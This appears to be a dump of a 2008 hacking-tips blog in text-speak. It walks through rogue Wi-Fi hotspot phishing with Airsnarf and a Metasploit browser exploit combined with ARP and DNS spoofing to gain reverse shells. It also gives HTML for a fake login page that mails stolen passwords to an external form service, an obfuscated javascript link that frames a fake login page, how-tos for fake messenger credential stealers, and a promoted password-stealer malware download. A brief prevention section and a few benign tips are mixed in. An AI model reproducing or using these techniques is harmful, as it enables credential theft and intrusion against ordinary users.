Wireless Hoptspot Hacks, " Wireless Hacks" tell abt how 2 perform hotspot hacks? hacks/cracks/techniques dat u ll hopefully find 2 be "cool".

Hack:
U might seen wilreless hotspots as they can seen anywhere, with T-Mobile,Concourse,Wayport & so on...As we know mobile user are quickly connected in public places.Some Hotspots are available for free or some require free subscription.IN public places these WI-Fi hotspot are the greater security risks which we find.

Stealing Wi-Fi Hotspot credentials:
Once in Russia a hacker used to hack username & passwords of dial accounts & used to sell them in black market & the owner of stolen credentials had to pay high charges.With the adding of public WI-Fi locations, hte threat of stealing credentials have been increased & also stealing wireless subscription credentials.
The easiest way to steal wireless subscription credentials is done by AP Phishing. Today's real & applicable method is that end-user determines dat a wireless access point is valid by recognizing the SSID and ascertaining if the site has the look and feel of the real public Wi-Fi hotspot login page.For the end-user both of these can be spoofed(u cannot create normal network connections) & u need not to carry wireless access point around for doing this.

Steps to perform this technique:

First of all u have to setup ur computer to look alike an actual acsess point broadcasting da appropriate SSID(T-Mobile, Wayport, etc.)

Now u have login page & ur PC ll display look alike original login page of provider whose signals u r broadcasting.

It is easy to make ur pc broadcast the SSID of ur Choice, so dat the user can connect to u instead of valid WI-Fi Hotspot SSID.The problem with dis method is sees dat dis is an Ad-Hoc network & they do not connect to it.Now we use Airsnarf by Schmoo Group to make da signal as it is coming from an access point, we turn our pc into access point.

Difficult part in using Airsnarf & other HostAp programs is to find a card which supports HostAP drivers.Generally we use Senao NL-2511CD PLUS EXT2 200mw PCMCIA Wi-Fi with a Rover Portable Laptop Mount 2.4GHz 5.5dBi Antenna, we can purchase them from http://www.wlanparts.com/.

Airsnarf consists of a number of configurable files that control how it operates.

airsnarf.cfg file used to configure basic Airsnarf functionality

airsnarf.cgi file

With Airnsnarf configured with default settings, it will display a default login page that looks like the following:

This page takes username & password which is entered & place it in a file wer it can be read.

For making dis attack work, we have modify this login page so dat it looks same as WI_Fi hotspot provider's login.Basic html skills are required, it is not so difficult to goto a T-Mobile, Wayport, STSN, Concourse or any other hotspot provider's site u have to copy & paste their graphics to make ur fake login page look real.

After configuring Airsnarf & creating fake login page, we can launch the attack.Any public place like airport,coffee shop's, parks wer people uses their laptops it ll work.For launching dis attack we have to activate Airsnarf by typing ./airsnarf command. Below u can c wat is going to happen after launching ur attack.

Airsnarf being launched and waiting for a connection

Here we see an end-user attempts to connect to the hotspot ll c the SSID which was entered in
airsnarf.cfg file & use der pc to connect to the network.After launching der browser, they r asked to enter their username & password.

Windows Zero Config showing the T-Mobile HotSpot being broadcast by Airsnarf

Fake Walled Garden/Login Page presented by Airsnarf

If the user enter his username & password & clicks on login button, his username & password has been sent to hackers & he can utilises it.Many of us keep same username & passwords for all accounts so dat we can remember,Now if da hackers gets ur username & password can access ur email's ur online banking & so on.....

Example of credentials entered into Airsnarf AP Phishing Site and dumped to a file

U can also make variations for the aboce trick to change SSID's to "Free Public Wi-Fi",& at this point u can change login page as below.

Many users ll fall for dis trick & u can access der accounts..

Malicious Websites & Browser Exploits:
Given the knowledge of the aforementioned exploits, a creative combination could be had. What if the walled garden/login page in the previous exploit actually contained code that would exploit a user's machine? That way an attacker could gain access to an end-user system just by that user attempting to connect to what they believe is a valid Wi-Fi hotspot. An exploit that could take advantage of this is Microsoft's relatively recent Create Text Range vulnerability. All a hacker would need to do is copy the malicious code into the login page and every person who connected to that hotspot could potentially be exploited.

Part of the actual code that could be inserted into a webpage to automatically download and run a malicious executable on the victim's machine just by that user viewing the webpage.

That would be "cool," but we're going to take it a step further. What if people who were currently connected to the hotspot were "forced" to view a malicious page, regardless of the URL they entered into their browser? That would be "cooler!"

This hack contains the following steps:

Creating a malicious webpage and serving-it-up on a laptop
Redirecting traffic at a Public Wi-Fi Hotspot to that malicious webpage running on the laptop
As the victim is redirected and the malicious page is viewed, a browser-based exploit is run which gives the hacker a live command shell (c:\) on the victim's machine

So, the hacker goes to a Public Wi-Fi hotspot and connects to the network. He then launches Metasploit to create the malicious webpage and serve-it-up.

Commands to use Microsoft's Create Text Range vulnerability and to select the option of creating a reverse shell back to the hacker once the exploit is executed

The setting of various options for the exploit

With all options set properly, the web page is served-up and ready to exploit the machine by running the "exploit" command

Now that there's a machine on the hotspot network running a malicious webpage, it's necessary to redirect traffic destined for the Internet to that website.

Run the arpspoof command to redirect traffic destined for the Internet to the malicious webpage.

Running dnsspoof, you can see that a user attempted to go to foxnews.com but was redirected to the malicious webpage.

This is the page that contains the malicious content that will enable a hacker to connect to the victim machine via Netcat. This page appears regardless of the URL entered by the end-user. This page could look like and say anything.

The hacker then launches Netcat. The C:\ is on the victim's machine which is real bad news for the victim. FYI - Windows XP Firewall and Symantec AV were running the entire time.

If you didn't want to go to a public Wi-Fi hotspot and serve-up the webpage, you could just host the website somewhere and send out e-mails trying to convince people to go to the site. With Metasploit, for example, the payload doesn't have to be a reverse shell, you can have the malicious webpage download and execute a malicious file. Perhaps that malicious file would install a Trojan, Keylogger, or other Malware.

Examples of possible Metasploit Payloads for ie_createtextrange exploit.

Now that we've seen the "cool" and illegal hacks, let's talk about the real purpose of this article - Prevention!

Preventing the Hacks:There are basically two things to combating the previous hacks:

Taking measures to ensure a hotspot is valid

Protecting the machine against browser-based exploits

Ensuring a Hotspot is Valid:
Validating a hotspot is extremely difficult for an end-user to do. In fact, the only realistic method to do so is to use a wireless client designed to work with various hotspots that can use some sort of WISPr check to help ensure the Hotspot is what it says it is. I used T-Mobile in the above example in large part because they are one of the few providers that can utilize this type of functionality. In fact, the best solution I know for enterprises to protect against public hotspot AP Phishing for their mobile users is to use a client such as Fiberlink's e360. Using a client such as this provides two areas of protection:

The hotspot signal itself can be validated
The end-user doesn't enter their credentials into a webpage which can be faked. They select a signal with the client and enter the credentials in that client.

Note that in the below graphic, a valid T-Mobile HotSpot is displayed as "Fiberlink Wireless Premium Powered by T-Mobile" as opposed to just "tmobile." That is because the client has determined that the particular hotspot in question is, in fact, a valid T-Mobile HotSpot. If it were not valid a valid hotspot, the SSID would simply be displayed as it is being broadcast.

Client-based solution that helps mitigate risk by helping to validate a hotspot.

As mentioned in the second point, the user enters their credentials into the client not into a web-based form. For many obvious reasons, this is significantly more secure. With this particular client, both the username and password are immediately encrypted with 256-bit AES.

The entering of credentials into a client as opposed to an easily spoofed webpage.

Protecting the Machine Against Browser-based Exploits:
As with many exploits, the key is to have the mobile device be protected at all times. To protect against these exploits, the mobile device needs to:

Have the latest security patches installed. This is increasingly difficult to do for corporations as laptops are spending less and less of their time connected to the corporate LAN. This is bad, since many corporations can only push patches to machines when they are on the LAN. Consequently, corporations need to employ solutions that can push patches down to mobile devices anytime they are connected to the Internet and without end-user interaction.
Be restricted from surfing the Internet or connecting wirelessly if they do not have the latest patches. This makes sense. If you are not secure enough to surf the Internet or connect to wireless hotspots, because you do not have a necessary patch, you shouldn't be able to do so. In essence, you need to protect yourself from yourself. For corporations, they are beginning to look at functionality such as Cisco NAC to help with this. Unfortunately, Cisco NAC only quarantines on the LAN or Post-VPN. It won't analyze the security posture of the mobile device or quarantine it if it doesn't have the necessary patches until it is essentially too late. That's why corporations need to implement solutions that will quarantine and remediate devices while the device is mobile, not just when they are VPNing into the corporate network. The logic for assessing the security posture and for quarantining needs to be on the endpoint itself!
Employ a program to protect against Zero Day type of attacks such as a Personal Firewall with IPS capabilities. As an example, even if the above machine weren't patched, ISS' Proventia would protect a machine against the aforementioned browser exploit.

conclusion: I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.

Conclusion:
I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.

Special thanks to the Metasploit Project and Schmoo Group. The use of your tools in explaining how the exploits are performed and the work you have put into the development of these tools is invaluable and appreciated.

The credit goes to the Ethical Hackers.

Wireless Hacking

noreply@blogger.com (saien) — Tue, 19 Feb 2008 09:21:00 +0000

Wireless Hacking at an height of 30,000 feet where there is no wireless network!

Outline:
As we all know travelers use their laptops in planes.This is a safe place as many flights don't provide with wireless/satellite access to internet for the passengers.Consequently,the biggest threat of security, is someone reading ur data.Wireless hacker can explore their systems without der knowledge.
We all know dat for configuring connection to a wireless network in win XP Zero Config, U have to goto the network connections & adding a network 2 da preferred network, U can connect 2 a wireless signal which have have been displayed on wireless networks & upon connection,it ll automatically add dat network on a network list.Win Xp automatically connects 2 dat network every time wen it is sensed & da applicable config info is maintained in dat network "bookmark". Laptop user is unknown wat occurs from dat point forward.Wat happens is Win Zero Config ll routinely, automatically sends probe requests into air, searches for an available network, if it find it gets connected to it, if it is not connected it sends again request for the network.

Hack:
Suppose ur in plane & a probe requests have been sent to u , searching for da network(S), u have defined in ur network section.One more person in plane is using laptop & running a program named as HotSpotter.Dis program ll c those probe requests & compare these with a list of known SSIDs, den it turns itself into wireless access point with an matching SSID of network in ur network list.Now u have been connected to the hackers "wireless network".If the user is not using firewall the hacker can easily hack his computer & his transactions & we think we r safe..

Check out here for another tool used in wireless hacking.

Tools:

Laptop with an wireless card which supports HostAP.

HotSpotter (we learned abt it above) program which contains scripts 2 run DHCP (U can dis program in Auditor security collections: http://www.remote-exploit.org/index.php/Auditor_main or http://www.remote-exploit.org )

Choice of programs on exploiting the victims pc, once de connected to ur WLAN.Check for the diff tools of same category in Auditor security collection...

Prevention:

Keep an up 2 date & running firewall with an IDS/IPS capability,this protects ur pc from detecting ur network by from the probe requests.

Run a configured Anti-Virus & Anti-spyware u can protect urself from hacking, if ur not using any anti-virus & anti-spyware they break into ur system & install malware,keyloggers,system monitors, remote hacking) & if u protections they ll detect these malware, keylogger, remote hacking & so on...

Use security enforcement software- Components such as McAfee's EPO & see dat all da security services which are running in ur pc from start up to shutdown always updated.

IF ur using Wi-Fi adapter disable it-enable wen u attemt to make a conection

How to make a fake page for yahoo,orkut,gmail..

noreply@blogger.com (saien) — Sun, 17 Feb 2008 09:07:00 +0000

How to make a fake page for yahoo,orkut,gmail & for any website...!By using fake pages u can hack passwords & now everyone knows it but there are some guys who don't know abt fake pages...Here i m not talking abt retrieving passwords but how to make a fake page...Have a look on it..♥

1.First of all open the page for which u wanna a make fake.

2. Save dat page, Goto to file & save the complete web page.

3. Now u have saved the exact page of that site & start the work.

4. Right Click on dat Page and click on edit.

5. Search for the word Form in code of dat page.

6. Delete dat Form Value , Method ,Action, delete everything watever written on it.

7. ADD this code

<form action=”http://www.big-llc.com/formmailer/submit” method=”post”><input type=”hidden” value=”Your Email Id” name=”fm-to”><font color=”#333333″> </font><input type=”hidden” value=”password D3″ name=”fm-title”><font color=”#333333″> </font><input type=”hidden” value=”Link You Want To redirect” name=”fm-redirect”><font color=”#333333″> </font>

8. Instead of Your Email Id write ur email address.

9. Save & close.

10. Upload ur fake page on any free hosting services.

Ur done with it u have made ur own fake page...

Related Articles:
Hack Orkut with Fake Page
Fake yahoo Messenger
Fake GTalk

Login with multiple ids at the same time in orkut

noreply@blogger.com (saien) — Sun, 17 Feb 2008 08:47:00 +0000

Login with multiple ids at the same time in orkut

Login with multiple ids at the same time in orkut , gmail , yahoo

To perform this trick u need firefox mozilla browser

======== Trick to Multilogin in firefox ============

Step 1:
open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

variable name: moz_no_remote(should be all small letter)

variable value: 1

press ok to close all windows.

step 2:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.

while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any(orkut,yahoo,rediff or anything else)..

For three logins create three profiles of firefox.

Orkut LogOut Code

noreply@blogger.com (saien) — Sun, 17 Feb 2008 08:18:00 +0000

Orkut LogOut Code, i think u have seen LogOut Scrap this is new trick to logout..

javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%66%72%61%6D%65%73%65%74%20%72%6F%77%73%3D%27%31%30%30%25%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%4E%4F%27%20%62%6F%72%64%65%72%3D%27%30%27%20%66%72%61%6D%65%73%70%61%63%69%6E%67%3D%27%30%27%3E%3C%66%72%61%6D%65%20%6E%61%6D%65%3D%27%63%6F%6E%72%5F%6D%61%69%6E%5F%66%72%61%6D%65%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%68%79%67%61%64%61%2E%66%72%65%65%77%65%62%37%2E%63%6F%6D%2F%53%65%72%76%69%63%65%4C%6F%67%69%6E%2E%68%74%6D%27%3E%3C%2F%66%72%61%6D%65%73%65%74%3E%22%29%3B%61%6C%65%72%74%28%22%48%61%48%61%21%20%74%68%61%74%20%77%61%73%20%61%20%74%72%69%63%6B%20%74%6F%20%6C%6F%67%20%79%6F%75%20%6F%75%74%22%29%0A%0A%0A

Copy the above code & paste it in address bar & u ll be logged out with a nice message..

Fake GTalk

noreply@blogger.com (saien) — Sun, 17 Feb 2008 04:21:00 +0000

Fake GTalk or google talk,This is one of the hacking trick to hack GTalk passwords, if ur successful in hacking his/her GTalk password & u can get Orkut & Gmail passwords also, actually this is the fake GTalk whenever anyone login in this GTalk his GTalk ID and Passwords are saved in ur system...

Steps:

Step 1 - Install Microsoft .NET Framework.(I think almost everyone has this in their computers if don't click here to download )

Step 2 - click here to get fake GTalk.

Step 3 - Tell any of ur friends to login, try to fish them by saying this is the new version of GTalk try it!!!

Step 4 - Open C:\google talk.txt & dats ur frnds GTalk id & passwords..

Fake Yahoo Messenger

noreply@blogger.com (saien) — Sun, 17 Feb 2008 04:04:00 +0000

Fake Yahoo Messenger, This is one of the hacking trick to hack yahoo passwords, actually this is the fake yahoo messenger whenever anyone login in this messenger his yahoo ID and Passwords are saved in ur system...

Steps:

Step 1 - Install Microsoft .NET Framework.(I think almost everyone has this in their computers if don't click here to download )

Step 2 - click here to get fake yahoo messenger

Step 3 - Rename that YPager as Yahoo Messenger.

Step 4 - Tell any of ur friends to login, try to fish them by saying this is the new version of yahoo try it!!!

Step 5 - Open C:\yahoo.txt & dats ur frnds yahoo id & passwords..

Hackers Secret Tools

noreply@blogger.com (saien) — Sat, 16 Feb 2008 06:29:00 +0000

Hackers Secret Tools and Books:

Rapidshare_Downloader:
http://rapidshare.com/files/63523932/Rapid_Down.rar
google_hack. 100 tips and tools:
http://rapidshare.com/files/59406147/google_hack._100_tips_and_tools.pdf
300_keygen:
http://rapidshare.com/files/60459159/300_keygen.rar
Hackers_Secrets:
http://rapidshare.com/files/59323690/Hackers_Secrets.rar
DAP_PREMIUM_v8.1.2.1:
http://rapidshare.com/files/63545122/DAP_PREMIUM_v8.1.2.1.rar
2500_Best_Ebooks_Collection_2007:
http://rapidshare.com/files/63545031/2500_Best_Ebooks_Collection_2007.htm

Saved Passwords in IE or Firefox Are Not Safe

noreply@blogger.com (saien) — Sat, 16 Feb 2008 05:56:00 +0000

Do U think ur saved passwords in Internet Explorer and Mozilla Firefox are safe?? really!! Check out here how much you are:

Whenever u type passwords into any web forms, in both Internet Explorer & Mozilla Firefox, its prompt out whether 2 remember u passwords, & many of us clicks on yes & our passwords are saved in the browser

Many of us think this “Remember Me” option in IE or Firefox is very much useful but the risky part is dat they keep ur login credential at risk.

View stored passwords in Internet Explorer:

Although Internet Explorer store ur passwords in Windows Registry database, but the risk is that anyone who can operate a computer can reveal ur hidden passwords by using IE PassView.

Look at this:

View stored passwords in Firefox:

For the Firefox users it is much more easier to reveal ur saved passwords which are stored inside

Way: Tools -> Options -> Security -> Show Passwords. Dats it shows ur all saved passwords...

Friends anyone can view ur hidden passwords who is having a bit knowledge on computer can reveal ur passowrds..

How to Keep urself safe:

Uncheck “Prompt me to save passwords” in Internet Explorer and “Set Master Password” in Mozilla Firefox.

Free Premium Rapidshare & Megaupload Accounts

noreply@blogger.com (saien) — Sat, 16 Feb 2008 05:16:00 +0000

Free Premium Rapishare and MegaUpload Accounts?

Free Rapidshare & MegaUpload account*Grab it fast*limited time.....
Get urself a Rapidshare & MegaUpload premium account all for urself from this site.... I got a 3 months Rapidshare & MegaUpload account for free and thought i would share this site with u guys... this works 100% guaranteed... so grab it fast guys.....click here to get urself a free Rapidshare & MegaUpload Accounts..

Plz do comment for ur requests & for the improvement for our site!!!♥

Kismet Wireless Network Sniffer

noreply@blogger.com (saien) — Sat, 16 Feb 2008 04:26:00 +0000

Free download kismet Wireless Network Sniffer, it is the latest hacking tool and the great thing about dis tool is this is wireless....I think many of u didn't heard about it..

Lets talk about this tool !!
kismet is one of the best wireless hacking tool.Kismat is 802.11 layer wireles network detecter,snifffer and intrusions detectionn system.It works with any wireless card which supports raw monitoring mode, it can also snifff 802.11b,802.11a and 802.11g trafficc

It identifies network byy passivelly collectin & detectin standard named networkss, detectin hidden network...

Features

Ethereall/Tcpdumpp compatible data logging
Airsnortt compatiblle week-iv packet logging
Networrk IP rangee detections
Builtt-in channell hopping and multi-card split channel hoppiing
Hiddenn network SSID delocking
Graphicall mappin of network
Client/Server architectture allows multiplle clientss to view a single
Kismet serves simultaneouslly
Manufacturers and modell identifications of accesss point and client
Detectiion of known defaullt accesss points configuration
Runtimee decodings of WEP's packet for known network
Named pipee o/p for integrations with other toolss, such as a layerr3 IDS's like Snortt
Multiplexing's of multiplle simultaneouss capturre source on a single Kismett instances
Distributted remotee drone sniffing's
XML o/p
Over 20 supported card types

The latest version of Kismet Wireless Network Sniffer click here to get it..

Plz do comment for ur requests & for the improvement for our site!!!♥

Earn money by surfing

noreply@blogger.com (saien) — Fri, 15 Feb 2008 12:51:00 +0000

Hi frnds, bored up by surfing net its time to earn money by simply surfing, hears goods ... ya its true guys u can earn $63/month for simply surfing as u do normally check here for more knowledge on it...

Password Stealer for all Messengers

noreply@blogger.com (saien) — Fri, 15 Feb 2008 11:21:00 +0000

Password Stealer for all Messengers, hack any messengers password using this software...
For doing this u have build ur pc into server .

Coder: c4!N
Compiler: Delphi
testet : Windows XP SP2
Source-Protector: Themida
Description: The UnLimited PW Stealer is a high-quality PW Stealer with the following characteristics:

hack the following accounts:

PW Messanger Packet

MSN Messenger
Windows Messenger
Yahoo Messenger Google Talk
ICQ Lite
AOL Instand Messenger/Netscape 7
Trilian
Miranda
GAIM

PW Mail Packet

Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape
Group Mail Free, Gmail
Yahoo Mail
Hotmail / MSN Mail
Eudora

Protected Storage PW Packet

Outlook Passwords
Auto Completet password in IE
Password protected sites in IE
MSN Explorer Passwords

Steam PW Packet

Steam Username
Steam Password
Steam game-path

Game Key Stealer

UT 2003/2004
Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
Need for Speed Hot Pursuit 2
James Bond 007 Nightfire
Command & Conquer Generals / Zero Hour
SimCity 4
Call of Duty 2 / United Offensive / 1
SWAT 4 / EXP

Windows Info Packet

Windows Username, Windows Computername ect. ect.

Other options are:

FTP Upload Information
Crypt the ploadfile PW Files
Crypt the FTP Settings
Melt Server (Self-Delete after Execute)
File Attribut on hidden set
Icon Changer
UPX Packer
and many more Smiley
UnLimited_PW_-_Stealer_0.40.rar
Description:
Download
Filename: UnLimited_PW_-_Stealer_0.40.rar
Filesize: 3.6 MB

Download Here

Password:

http://zone.forums1.net

Just copy & paste the above code where it asks for the passwords...

Related posts:
Hack yahoo passwords
Fake yahoo messenger
Gmail Password Hacking
Fake GTalk

Free calls all over the world

noreply@blogger.com (saien) — Fri, 15 Feb 2008 11:17:00 +0000

Free calls all over the world daily for 5 min , call anywhere in the for free for 5 min daily isn't it cool guys!!!click here to check out..

Enjoy!!!!

Free Hacking Softwares

noreply@blogger.com (saien) — Fri, 15 Feb 2008 10:49:00 +0000

Download free hacking and cracking softwares...The names are tace ip,hide ip,account locker,anti-mail bomber,emotion creator,freeze account,msn block checker,hot hack,msn password recovery,password grabber,yahoo cracker,yahoo password grabber and many more...
i hope guys u like these softwares....

How to remove "Orkut is banned" Virus

noreply@blogger.com (saien) — Thu, 14 Feb 2008 14:47:00 +0000

How to remove "Orkut is banned" Virus or how to disable dat virus from ur computer. I think u have seen a trick to remove dat w32.USB worm, from ur computer many of them as said u to goto task Manger & then goto processor delete a particular file from it , its a long procudure to do it & i think many of us didn't understand.

Here i ll give u a software which automatically removes dat virus from ur computer and heals registry & it enables "show hidden files option" & also makes the pc immune to the viruses, if u double click the virus next time it wont affect the system.

Download here

Who Used Your Pc In Your Absence,what Did He Do?

noreply@blogger.com (saien) — Thu, 14 Feb 2008 14:03:00 +0000

Track my computer!

Who Used my computer, In my absense,what did he do?Here is a small trick which shows who operated your pc what did he do & watch he hs watching how much long he has been using ur pc...

First you should goto :

start-- > run-- > eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.

Double click on the eg: info and it will show u the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

Hope u all will like it.